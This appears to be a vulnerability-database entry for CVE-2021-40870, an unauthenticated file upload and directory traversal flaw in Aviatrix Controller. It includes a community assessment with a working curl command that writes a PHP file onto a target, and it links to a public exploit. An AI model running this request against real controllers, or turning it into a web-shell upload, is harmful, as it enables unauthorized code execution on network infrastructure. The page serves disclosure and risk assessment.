logo
DATABASE RESOURCES PRICING ABOUT US

CVE-2021-40870

Description

An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal. **Recent assessments:** **JoyGhoshs** at October 09, 2021 6:33am UTC reported: ### Description This Vulnerability allows an attacker to create and store file on the Aviatrix controller. Exploitation phase doesn’t need any user authentication , or doesn’t require any other users interaction , simply can be exploited using curl . Here is one example. curl -k https://aviatrix.domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/poc.php -d 'data=hello<?php echo "Vulnerable Poc";?>' # after executing the previous command if the target is vulnerable this will create a php file on this path https://vulnerable.target.com/v1/poc Attacker can do this unauthenticated because many API calls do not enforce a check for authentication. So this allows an unauthenticated attacker to upload arbitrary files, including .php scripts, to the filesystem . Or You can Use This Exploit to do the exploition more easily : <https://github.com/JoyGhoshs/CVE-2021-40870> ![Exploitation](https://i.ibb.co/2vwq3TS/Screenshot-20211009-123757.png) Assessed Attacker Value: 3 Assessed Attacker Value: 3Assessed Attacker Value: 5


Related